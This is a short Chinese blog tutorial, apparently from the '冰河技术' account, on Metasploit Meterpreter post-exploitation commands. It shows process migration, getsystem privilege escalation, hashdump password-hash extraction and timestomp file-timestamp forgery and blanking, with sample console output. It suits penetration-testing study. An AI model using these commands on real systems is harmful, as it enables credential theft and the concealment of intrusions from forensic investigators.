# Metasploit高级后渗透模块
# 迁移到更安全的进程
migrate [要迁移到的进程id]
1
# 获取系统级权限
getsystem
1
注:getsystem模块在比较新的Windows系统中不太稳定,最好使用本地的提升权限方法和模块来提升控制权限。
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
1
2
2
# 获取密码的哈希值
run hashdump
1
获取了目标的系统级管理权限后,就可以使用hashdump命令获取被渗透系统上登录密码的哈希值。
# 修改文件的访问时间、修改时间和创建时间
这里用到的命令是timestomp
# 查看文件的时间信息
timestomp -v [目标文件]
meterpreter > timestomp -v e:\test.txt
[*] Showing MACE attributes for e:test.txt
Modified : 2019-01-25 10:24:42 +0800
Accessed : 2019-01-25 11:20:58 +0800
Created : 2019-01-25 10:23:22 +0800
Entry Modified: 2019-01-25 10:24:42 +0800
1
2
3
4
5
6
7
8
2
3
4
5
6
7
8
# 修改文件的时间信息
timestomp -z [时间信息] [目标文件]
1
此时的时间信息格式为:MM/DD/YYYY HH24:MI:SS
meterpreter > timestomp -v e:\test.txt
[*] Showing MACE attributes for e:test.txt
Modified : 2019-01-25 10:24:42 +0800
Accessed : 2019-01-25 11:20:58 +0800
Created : 2019-01-25 10:23:22 +0800
Entry Modified: 2019-01-25 10:24:42 +0800
meterpreter >
meterpreter > timestomp -z "01/25/2019 11:00:00" e:\test.txt
[*] Setting specific MACE attributes on e:test.txt
meterpreter > timestomp -v e:\test.txt
[*] Showing MACE attributes for e:test.txt
Modified : 2019-01-25 11:00:00 +0800
Accessed : 2019-01-25 11:26:29 +0800
Created : 2019-01-25 11:00:00 +0800
Entry Modified: 2019-01-25 11:00:00 +0800
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 清空时间信息
timestomp -b [目标文件]
meterpreter > timestomp -b e:\test.txt
[*] Blanking file MACE attributes on e:test.txt
1
2
3
4
2
3
4
# 写在最后
如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!